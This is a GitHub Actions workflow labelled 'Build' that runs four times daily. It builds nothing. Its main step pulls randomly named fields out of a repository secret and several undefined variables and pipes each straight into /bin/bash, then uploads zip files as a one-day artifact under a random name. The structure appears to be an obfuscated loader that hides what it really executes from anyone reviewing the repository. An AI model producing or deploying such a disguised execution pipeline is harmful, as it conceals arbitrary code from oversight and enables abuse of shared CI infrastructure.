name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '15 3,9,15,21 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          x0: ${{ secrets.x0 }}
        run: |
          printf '%s' "$x0" | jq -r .ad281 | /bin/bash
          echo $ywc685 | jq -r .fsjvy16192 | /bin/bash
          printf '%s' "$oi228" | jq -r .yrq66055 | /bin/bash
          printf '%s' "$khlv81" | jq -r .oqmlf4445 | /bin/bash
          printf '%s' "$rdgs4968" | jq -r .zm9 | /bin/bash
          printf '%s' "$jt6637" | jq -r .u1 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: zcdGZraC
          path: "*.zip"
          retention-days: 1
